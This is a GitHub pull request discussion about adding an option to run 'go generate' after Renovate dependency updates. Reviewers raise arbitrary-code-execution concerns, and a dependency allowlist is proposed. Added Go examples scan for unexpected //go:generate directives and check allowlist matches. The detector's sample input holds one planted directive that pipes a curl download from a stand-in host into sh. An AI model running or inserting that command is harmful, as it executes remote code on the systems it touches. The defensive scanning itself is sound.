
Conversation

@mglazer
Contributor

@mglazer mglazer commented Nov 7, 2025

Changes

This change adds a goGenerate postUpdateOption which enables running go generate ./... after a dependency update.

Frequently when dependencies are brought in via tools or using vendored code, and those dependencies are used for go:generate instructions, we want to update the generated code after the dependency has been updated.

Adding this as a postUpdateCommand wasn't really satisfactory since that necessarily requires making a change in two spots (one in the allowed commands, one in the postUpdateCommand). The other reason this was undesirable was it would cause generate to run after every dependency update, regardless of language.

Context

Please select one of the below:

  • This closes an existing Issue, Closes: #
  • This doesn't close an Issue, but I accept the risk that this PR may be closed if maintainers disagree with its opening or implementation

AI assistance disclosure

Did you use AI tools to create any part of this pull request?

Please select one option and, if yes, briefly describe how AI was used (e.g., code, tests, docs) and which tool(s) you used.

  • No — I did not use AI for this contribution.
  • Yes — minimal assistance (e.g., IDE autocomplete, small code completions, grammar fixes).
  • Yes — substantive assistance (AI generated non‑trivial portions of code, tests, or documentation).
  • Yes — other (please describe):

Documentation (please check one with an [x])

  • I have updated the documentation, or
  • No documentation update is required

How I've tested my work (please select one)

I have verified these changes via:

  • Code inspection only, or
  • Newly added/modified unit tests, or
  • No unit tests but ran on a real repository, or
  • Both unit tests + ran on a real repository

The public repository: n/a (is private)

@CLAassistant

CLAassistant commented Nov 7, 2025

CLA assistant check
All committers have signed the CLA.

This change adds a `goGenerate` postUpdateOption which enables
running `go generate ./...` after a dependency update.

Frequently when dependencies are brought in via tools or using
vendored code, and those dependencies are used for go:generate
instructions, we want to update the generated code after the dependency
has been updated.

Adding this as a postUpdateCommand wasn't really satisfactory since that
necessarily requires making a change in two spots (one in the allowed
commands, one in the postUpdateCommand). The other reason this was
undesirable was it would cause generate to run after every dependency
update, regardless of language.
@mglazer mglazer force-pushed the mglazer/support-go-generate branch from 0348585 to 0685872 on November 7, 2025 14:25
Member

@viceice viceice left a comment


LGTM besides some security concerns 🤔

@jamietanna
Contributor

Yeah this does technically have some very valid risks, because we are now executing arbitrary commands

Note that this does have similar risks to https://docs.renovatebot.com/modules/manager/gradle/#dependency-verification where running ./gradlew ... can effectively execute arbitrary code as part of any of the buildscripts

The code being executed (to generate code) could be maliciously attacked, similar to what we see with npm install's postinstall scripts
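
An added illustration of the risk raised in the comment above (example code, not Renovate's and not part of this PR): a pre-flight scan that lists what `go generate ./...` would actually execute, so the directives can be reviewed before a bot runs them after a dependency bump. It applies the recognition rule `go generate` itself uses (marker at column 0 followed by a space or tab, `-command` aliases expanded for later lines). The sample source file, the allowlist of expected generators and the `Unexpected` helper are constructed for the example.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Directive is one //go:generate line as go generate would see it,
// with any -command alias already expanded.
type Directive struct {
	Line    int
	Command string   // program that would be executed
	Args    []string // remaining arguments
}

// FindGenerateDirectives scans Go source text for //go:generate lines.
// It mirrors the rule go generate applies: the marker must start at column 0
// and be followed by a space or tab; "-command NAME prog args..." defines an
// alias that later directives may use as their command.
func FindGenerateDirectives(src string) []Directive {
	aliases := map[string][]string{}
	var out []Directive
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		if !strings.HasPrefix(line, "//go:generate ") && !strings.HasPrefix(line, "//go:generate\t") {
			continue
		}
		// Simplification: go generate keeps a double-quoted string as one
		// argument; Fields splits it. The command word is unaffected.
		words := strings.Fields(strings.TrimPrefix(line, "//go:generate"))
		if len(words) == 0 {
			continue
		}
		if words[0] == "-command" {
			if len(words) >= 3 {
				aliases[words[1]] = words[2:]
			}
			continue
		}
		if exp, ok := aliases[words[0]]; ok {
			words = append(append([]string{}, exp...), words[1:]...)
		}
		out = append(out, Directive{Line: n, Command: words[0], Args: words[1:]})
	}
	return out
}

// Unexpected returns the directives whose command is not on the allowlist
// of generators the repository is known to use.
func Unexpected(ds []Directive, allowed map[string]bool) []Directive {
	var bad []Directive
	for _, d := range ds {
		if !allowed[d.Command] {
			bad = append(bad, d)
		}
	}
	return bad
}

// sample is a constructed Go file for the example, not taken from any real
// repository. Line 6 is the kind of directive a compromised dependency or
// contributor could plant; line 7 is ignored because of the leading space.
const sample = `package foo

//go:generate stringer -type=Color
//go:generate -command mock go run github.com/golang/mock/mockgen
//go:generate mock -source=iface.go -destination=mock_iface.go
//go:generate sh -c "curl -s https://example.invalid/x | sh"
// go:generate not-a-directive (leading space, ignored by go generate)

type Color int
`

func main() {
	ds := FindGenerateDirectives(sample)
	allowed := map[string]bool{"stringer": true, "go": true}
	for _, d := range Unexpected(ds, allowed) {
		fmt.Printf("line %d: would run %q %v\n", d.Line, d.Command, d.Args)
	}
}
```

Running this over a real tree (one call per .go file) before enabling an automatic `go generate` gives a reviewable list of every program the bot would invoke, which is the same question one asks of `./gradlew` build scripts or npm postinstall hooks.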

@mglazer
Contributor Author

mglazer commented Nov 7, 2025

@jamietanna: What is the generally accepted practice for dealing with these types of issues in renovate dependency bumps?

Possible options I can come up with:

  1. Add a configuration option which only runs go:generate when a specific allowlist of dependencies is updated. This would minimize the attack possibilities since it allows me to control which dependencies get this behavior and which dependencies don't.
  2. Run in a sandbox? Honestly unsure if this is remotely feasible.

If you think 1 is viable, I suspect the right spot to insert it would be similar to where goGetDirs is currently configured:

https://docs.renovatebot.com/configuration-options/#gogetdirs

and add an option such as:

goGenerateAllowedDeps: [
  "github.com/trusted/dependency"
]

Where the valid config would be:

if empty: run go generate after updating any dependency
if set: only run go generate after updating the dependencies specified in the allowed list

Thoughts?
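
The allowlist semantics proposed in the comment above, as an added example (not Renovate's code and not part of this PR): `ShouldRunGoGenerate` treats an empty list as "run on any update" and otherwise runs only when an updated module matches an entry. The function names and the sample module paths are assumptions made for the example. Matching is exact or by Go's `/vN` major-version suffix rather than by string prefix, since a prefix test would let an unrelated module whose path merely starts with a trusted one satisfy the allowlist.

```go
package main

import (
	"fmt"
	"strings"
)

// matchesModule reports whether the updated module path dep is covered by one
// allowlist entry. It accepts an exact match or the same path with a Go
// major-version suffix (/v2 and up), because github.com/x/y/v2 is a distinct
// module path for the same project. A bare prefix test is deliberately not
// used: it would let github.com/trusted/dependency-evil satisfy an entry for
// github.com/trusted/dependency.
func matchesModule(dep, allowed string) bool {
	if dep == allowed {
		return true
	}
	if !strings.HasPrefix(dep, allowed+"/v") {
		return false
	}
	major := strings.TrimPrefix(dep, allowed+"/v")
	if major == "" || major[0] == '0' || major == "1" {
		return false // v0 and v1 never carry a path suffix
	}
	for _, c := range major {
		if c < '0' || c > '9' {
			return false
		}
	}
	return true
}

// ShouldRunGoGenerate applies the proposed goGenerateAllowedDeps semantics:
// an empty allowlist means every dependency update triggers go generate,
// a non-empty one only updates to a listed module. It also returns the
// updated modules that matched, so the decision can be logged.
func ShouldRunGoGenerate(updated, allowed []string) (bool, []string) {
	if len(allowed) == 0 {
		return len(updated) > 0, updated
	}
	var hits []string
	for _, dep := range updated {
		for _, entry := range allowed {
			if matchesModule(dep, entry) {
				hits = append(hits, dep)
				break
			}
		}
	}
	return len(hits) > 0, hits
}

func main() {
	// Constructed inputs: an allowlist with one entry and a batch of updates.
	allowed := []string{"github.com/trusted/dependency"}
	updated := []string{
		"github.com/trusted/dependency/v2",   // matches via /v2 suffix
		"github.com/trusted/dependency-evil", // must not match
		"golang.org/x/text",                  // unrelated
	}
	run, hits := ShouldRunGoGenerate(updated, allowed)
	fmt.Printf("run go generate: %v (matched %v)\n", run, hits)
}
```

The matched list is worth surfacing in the update's log or PR body: it records which trusted module justified running generators, which is the evidence a reviewer needs if generated output later turns out to be unexpected.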

@jamietanna
Contributor

(Haven't forgotten about this - will get back to it this week - need to have a think)

